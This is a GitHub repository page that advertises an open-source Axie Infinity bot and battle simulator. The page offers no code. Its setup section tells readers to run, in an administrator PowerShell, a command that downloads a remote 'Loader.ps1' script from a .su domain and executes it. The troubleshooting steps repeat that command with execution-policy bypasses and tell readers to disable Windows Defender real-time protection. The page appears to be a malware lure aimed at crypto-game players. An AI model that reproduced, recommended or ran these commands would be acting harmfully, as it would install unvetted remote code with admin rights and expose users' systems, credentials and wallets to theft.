Skip to content

Latest commit

Β 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

Open-Source Axie Infinity Automation & Battle Simulator

An advanced, open-source Axie Infinity bot and desktop assistant designed to optimize strategy, automate repetitive queue tasks, and simulate card battles. This open-source framework leverages computer vision and AI-driven decision-making algorithms to enhance tactical efficiency in Axie Infinity.


Key Features & Functionality

  • Smart Axie Infinity Automation Tool: Streamlines matchmaking queues and energy tracking processes.
  • AI Battle Simulator & Helper: Analyzes current hand cards, estimates opponent energy, and suggests optimal card combinations based on win-rate data.
  • Computer Vision Framework: Automatically detects active game states, card types, and health bars without altering game files.
  • Real-time Match Analytics: Generates detailed session reports and tracks daily SLP/AXS performance metrics.
  • Cross-Platform Desktop Application: Fully compatible with Windows and macOS environments.

πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.


About

Axie Infinity automation bot and strategic battle simulator. Features include automated card management, AI-driven gameplay analysis, and real-time match tracking tool for desktop.

Topics

Resources

Stars

200 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors